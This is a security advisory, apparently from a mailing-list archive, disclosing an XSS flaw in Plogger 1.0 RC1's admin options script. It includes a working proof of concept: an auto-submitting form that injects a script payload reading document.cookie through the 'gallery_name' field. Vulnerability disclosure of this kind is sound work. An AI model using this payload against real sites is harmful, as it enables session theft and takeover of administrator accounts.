[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

HTB22926: XSS vulnerability in Plogger



Vulnerability ID: HTB22926
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_plogger.html
Product: Plogger
Vendor: Plogger Team ( http://www.plogger.org/ ) 
Vulnerable Version: 1.0 RC1
Vendor Notification: 29 March 2011 
Vulnerability Type: XSS
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "plog-admin/plog-options.php" script to properly sanitize user-supplied input in "gallery_name" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/plog-admin/plog-options.php"; method="post">
<input type="hidden" name="gallery_name" value='my gallery"><script>alert(document.cookie)</script>'>
<input type="hidden" name="gallery_url" value="http://host/";>
<input type="hidden" name="admin_username" value="Ildar">
<input type="hidden" name="admin_email" value="valeevildar@xxxxx">
<input type="hidden" name="admin_password" value="">
<input type="hidden" name="confirm_admin_password" value="">
<input type="submit" id="btn" name="submit" value="Update Options">

</form>
<script>
document.getElementById('btn').click();
</script>